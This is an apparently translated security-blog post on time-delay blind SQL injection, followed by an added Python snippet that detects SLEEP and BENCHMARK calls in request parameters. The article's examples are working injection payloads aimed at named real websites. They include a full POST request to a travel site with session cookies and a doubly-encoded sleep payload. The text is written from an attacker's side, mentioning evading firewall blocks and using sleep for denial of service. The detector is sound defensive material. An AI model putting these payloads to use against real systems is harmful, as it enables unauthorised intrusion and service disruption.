
sleep delay injection

Published: 2020-06-29 15:30:12  Source: Internet  Views: 1260  Author: lilei754212328  Category: Security Technology

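A:     Time-difference injection, also called delay injection, is a blind-injection technique. A SQL statement containing a function that is sensitive to execution time is submitted, and the length of the execution time is used to judge whether it executed successfully: for example, a true condition leads to a long execution time and a false one to a short execution time. This is the so-called advanced blind injection.
     The injection is carried out with the BENCHMARK and sleep functions.
     sleep can also be used to cause a denial of service.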

B:

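Sometimes, while we are injecting into a site, the site suddenly becomes unreachable:

we have been temporarily isolated by the firewall and cannot browse its pages, and at that point we have to change IP or wait for access to recover.

Or, when the injection parameters are submitted, some protection measure on the site redirects to an error page, and normal access only resumes after the error page has been visited N times.

This hurts our efficiency, which is why delay injection counts as a lesson of its own; it is quite important.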


C:

   Tuniu main site delay injection + WAF bypass

   http://www.2cto.com/Article/201502/377118.html


eg.1

http://wap.people.com.cn/newsView.php?sid=&cnid=1456639 and sleep(99999999999)&chid=1_14_3&coid=1_14_3_1&wv=2&v=l&return=c


eg.2


POST /main.php?do=online_book_do_visitor HTTP/1.1
Host: km.tuniu.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://km.tuniu.com/main.php?do=online_book_visitor&order_id=4550094
Content-Length: 285
Cookie: p_phone_400=4007-999-999;
PHPSESSID=8v1dgvcbbm0elnoprf91chnfv7; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; tuniuuser_citycode=MzMwMg%3D%3D; s_cc=true; s_nr=1421595835812; s_sq=%5B%5BB%5D%5D; __utma=1.151979505.1421595199.1421595199.1421595199.1; __utmb=1.170.9.1421599758357; __utmc=1; __utmz=1.1421595199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _tacau=MCxmMWJlYWNiMS03N2M1LTQ0ZjEtOThlMC0wYzc5ZWE2ZTRjMmQs; _tact=Y2UyNzU5NmMtMDIxNS0yMjFjLTgzYjItMDgxODUyOTM0ODVm; _tacz2=taccsr%3D%28direct%29%7Ctacccn%3D%28none%29%7Ctaccmd%3D%28none%29%7Ctaccct%3D%28none%29%7Ctaccrt%3D%28none%29; _taca=1421595199130.1421595199130.1421595199130.1; _tacb=NGYzNDkyNWMtY2ZlNi05MmJjLTA4MDAtOTgxMmFlYjRlZTkx; _tacc=1; tuniuuser_ip_citycode=MjAw; tuniuuser=NzczODQ4Niw2ODIzNjEzODU5LDY4MjM2MTM4NTkmcXVvdDsmYW1wO2d0O3M7JiMwMzk7LDAsMTQyMTU5NTQzMiw5ZjY0OTg2YzdkYzE0NzM0ZDEwZGFiZjM2NWYyMDBlOQ%3D%3D; tuniusub=1; tuniuuser_p_w_picpath=aHR0cDovL20udHVuaXVjZG4uY29tL2ZpbGVicm9rZXIvY2RuL3ByZC83NS8wYy83NTBjMmRhYmFhZjRmYjY4ZjI2NzVlM2NlZjA1YmM2ZC5wbmc%3D; tuniuuser_vip=MA%3D%3D; tuniuuser_level=MA%3D%3D; tuniuuser_id=7738486; tuniuuser_name=NjgyMzYxMzg1OSZxdW90OyZhbXA7Z3Q7czsmIzAzOTs%3D; Hm_lvt_dbdbb8d9c6cd72876c254897549e524b=1421503111,1421591375,1421594808,1421595437; Hm_lpvt_dbdbb8d9c6cd72876c254897549e524b=1421597431; tuniu_app_cc=list_three_days; tuniu_zeus=MzNfMV8yXzFfMV83OjpodHRwOi8vd3d3LnR1bml1LmNvbS9zdGF0aWMveW91amkvOjoyMDE1LTAxLTE4IDIzOjM5OjE0%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly90b3AudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0NTozMA%3D%3D%2CMTFfMl8xXzJfNV8xOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTggMjM6NDY6MDg%3D%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly93d3cudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0ODozNQ%3D%3D%2CMTJfMl8xXzFfMl8zOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTkgMDA6NDk6MTg%3D; visit_history=5186662%2C780023%2C; _um_uuid=f7a45f3da941376f5abce7a65b613f27; __ozlvd1940=1421602934; tuniu_is_login=MQ%3D%3D; tuniu_newer=set_one_day; Hm_lvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421253828,1421597324; 
Hm_lpvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421597366; appdown=1; TUNIUmuser=1c80b2cffeddb233b6a4fbfddb375c15; tuniu_partner=MTAxLDAsLDlmZDgyZThjYTZkNGMwMTlmZTUyNzdlYjJmNTcxYzQ1; pgv_pvi=3638345589; pgv_info=ssi=s4790786375; tel_400=4007996820; PageSwitch=2%2C1429375904; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

visitor_info=123,33071919680425367s1l'+and+sleep%252811%2529+and+'1,1,1968-04-25,


eg.3


Place: GET

    Parameter: appid

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: appid=330051' AND SLEEP(5) AND 'xRsl'='xRsl&host=admin5.com
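
A defender-side check for the parameter values shown in eg.1 to eg.3, as an added example that is not part of the original article: it URL-decodes a value until it stops changing and flags a call to SLEEP or BENCHMARK, which also catches the doubly encoded `sleep%252811%2529` in eg.2. The function names, the three-round decode limit and the benign sample are assumptions of this example.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Timing functions this article names: SLEEP(...) and BENCHMARK(...).
TIMING_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # assumption: upper bound on nested URL-encoding layers


def normalize(value: str) -> tuple:
    """URL-decode until the value stops changing; return (text, rounds used)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect(value: str) -> Optional[dict]:
    """Return a finding when a parameter value carries a timing call, else None."""
    text, rounds = normalize(value)
    match = TIMING_CALL.search(text)
    if match is None:
        return None
    return {
        "function": match.group(1).lower(),
        "decode_rounds": rounds,
        # Two or more rounds: the call was only visible after nested decoding.
        "nested_encoding": rounds > 1,
    }


# Raw parameter values copied from eg.1-eg.3, plus one constructed benign value.
SAMPLES = {
    "eg.1 cnid": "1456639 and sleep(99999999999)",
    "eg.2 visitor_info": "123,33071919680425367s1l'+and+sleep%252811%2529+and+'1,1,1968-04-25,",
    "eg.3 appid": "330051' AND SLEEP(5) AND 'xRsl'='xRsl",
    "constructed benign": "how+to+sleep+better",
}


def scan(samples: dict) -> dict:
    """Map each sample name to its finding (None when nothing was flagged)."""
    return {name: inspect(value) for name, value in samples.items()}


if __name__ == "__main__":
    for name, finding in scan(SAMPLES).items():
        print(f"{name}: {finding or 'clean'}")
```

A match here is a signal for alerting or blocking at the edge; the application-side fix for all three cases is a parameterized query.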

